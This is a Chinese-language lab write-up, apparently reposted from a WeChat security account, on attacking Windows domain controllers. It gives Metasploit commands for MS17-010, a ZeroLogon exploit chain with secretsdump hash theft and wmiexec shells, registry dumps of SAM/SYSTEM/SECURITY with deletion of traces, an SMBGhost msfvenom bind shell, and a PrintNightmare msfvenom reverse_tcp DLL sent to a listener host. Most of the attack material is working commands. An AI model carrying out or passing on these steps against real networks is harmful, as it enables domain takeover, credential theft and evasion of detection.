MS17010
use exploit/windows/smb/ms17_010_eternalblueset rhosts x.x.x.xrun
CVE-2020-1472
WindowsServer2008R2forx64-basedSystemsServicePack1WindowsServer2008R2forx64-basedSystemsServicePack1(ServerCoreinstallation)WindowsServer2012WindowsServer2012(ServerCoreinstallation)WindowsServer2012R2WindowsServer2012R2(ServerCoreinstallation)WindowsServer2016WindowsServer2016(ServerCoreinstallation)WindowsServer2019WindowsServer2019(ServerCoreinstallation)WindowsServer,version1903(ServerCoreinstallation)WindowsServer,version1909(ServerCoreinstallation)WindowsServer,version2004(ServerCoreinstallation)
探测脚本:
https://github.com/SecuraBV/CVE-2020-1472
利用脚本:
https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py
随后利用impacket中的secretsdump脚本来获取域中保存的hash
域控名:afa.com
DC的NetBios名:DC-AFA
查看NetBios名命令:
根据结果,基本administrator500的那个就是域管了,有了hash,就可以结合wmiexec来获取一个shell:
随后需要获取目标机的sam然后解密一下hash,之所以要这个步骤,是因为前面漏洞利用的时候,我们把域控密码置为空了,如果不改回去,后续可能会影响域相关功能,且也容易被发现。
改回去则需要一串MACHINE.ACC的值,该值可从sam中获取,步骤如下,首先从注册表保存下相关的save:
reg save HKLMsam sam.savereg save HKLMSYSTEM SYSTEM.savereg save HKLMSECURITY SECURITY.save
然后使用get命令将这三个save文件下载回来,注意,不通版本的wmiexec的下载命令有区别,最好help查看一下:
get sam.saveget SYSTEM.saveget SECURITY.save
下载后记得把目标服务器的删除:
del /q /f sam.savedel /q /f SYSTEM.savedel /q /f SECURITY.save
如果文件过大,可以考虑压缩后再下载,windows本身的makecab支持进行压缩:
makecab /d compressiontype=lzx 1.txt 1.rar其中d参数用来指定压缩类型,而lzx是一种高质量压缩的形式,下面例子中,不带该参数压缩后大小为400k左右,带上后其大小为200k左右:
下载本地后还使用secretsdump即可,解析一下,图中标注的那串值就是
恢复用到的脚本:
https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py其中afa是域控名,DC-AFA是NetBios名,DC-afa是域控的主机名,这里的格式和上面那个利用脚本一样,主机名换成IP应该也可以(没测试):
恢复后再重新获取hash就获取不到了,从新运行restorepassword会报错:
CVE-2020-0796也叫永恒之黑,是SMBv3(3.1.1)的远程代码执行漏洞。其影响范围:
Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server , Version1903 (ServerCoreinstallation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server , Version1909 (ServerCoreinstallation)
基本是侧重于win10,而win10很少有做为域控的,但这里也了解一下。
利用脚本:
https://github.com/chompie1337/SMBGhost_RCE_PoC首先先用msfvenom生成一个payload,b代表去掉坏字符,即影响payload的字符,在python中x00相当于个空串,i代表payload的编码次数,f指定payload的格式:
随后将exploit脚本中USER_PAYLOAD那段替换为上门的payload,替换后把buf关键字批量替换成USER_PAYLOAD即可:
运行exploit脚本(我这系统版本对不上,失败了),如果提示physical read failed,可以参考如下链接:
https://github.com/chompie1337/SMBGhost_RCE_PoC/issues/6
版本符合,脚本执行成功的话,目标机会开启4444端口,这时再用msf去连接即可:
use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 4444set rhost 192.168.136.152run
PS:我们利用这个漏洞前需要确认目标版本是否符合,这个可以用两种方法,一种是找相关的批量探测扫描脚本,如果符合,会提示存在漏洞,比如:
https://github.com/ZecOps/SMBGhost-SMBleed-scanner
第二个就是通过ver命令看下目标机的版本号,1903对应的小版本是18362,当然winver也可以看,不过会弹框出来,不适用于命令行:
CVE-2021-1675
CVE-2021-1675为Windows Print Spooler权限提升漏洞,前提条件是需要一个普通域账户及开启Spooler服务,其影响版本如下列表:
Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2012 (Server Core installation)Windows Server 2012Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Windows Server 2008 for x64-based Systems Service Pack 2Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Windows Server 2008 for 32-bit Systems Service Pack 2Windows RT 8.1Windows 8.1 for x64-based systemsWindows 8.1 for 32-bit systemsWindows 7 for x64-based Systems Service Pack 1Windows 7 for 32-bit Systems Service Pack 1Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server, version 2004 (Server Core installation)Windows 10 Version 2004 for x64-based SystemsWindows 10 Version 2004 for ARM64-based SystemsWindows 10 Version 2004 for 32-bit SystemsWindows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows Server, version 1909 (Server Core installation)Windows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
普通域账户有,当初建域时新建了两个,一个jack一个jixi,而Spooler服务都是默认开启的:
条件满足后,首先下载一下利用脚本:
git clone https://github.com/cube0x0/CVE-2021-1675.gitcd CVE-2021-1675/SharpPrintNightmare
进到SharpPrintNightmare目录后,需要下载指定的impacker包:
git clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install
注意:如果在Kali上运行该脚本的话,会和自带的impacker起冲突,这里我用的ubuntu运行的,ubuntu需要手动安装一下smb服务:
sudo apt install samba samba-commonsudo vim /etc/samba/smb.confsudo service smbd start
其中编辑smb.conf文件,直接在文件末尾添加以下内容:
[global]map to guest = Bad Userserver role = standalone serverusershare allow guests = yesidmap config * : backend = tdbsmb ports = 445[smb]comment = Sambapath = /tmp/guestok = yesread only = nobrowsable = yes
[smb]代表是smb共享服务的路径名叫smb,如果你叫smb2,那么访问共享的路径就需要带上smb2,path代表的是共享目录,共享文件要放这个目录。
配置好后,这里用msf生成一个dll,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=4444 -f dll -o /tmp/sysa.dll将该dll复制到ubuntu的tmp目录下,此时目标机是可以访问到的:
至此就可以运行脚本了,脚本运行格式如下:
python3 CVE-2021-1675.py 域名/域普通用户名:用户密码@域控IP smb共享文件的路径这个洞也可以打非域内的机器,非域内的话,把域名去掉就可以。
dll文件会打到目标机上:
meterpreter监听本地相应端口即可收到shell,我这里失败了,上不了线,先暂时这样吧,后续有机会再看看。
原文始发于微信公众号(aFa攻防实验室):域控相关漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论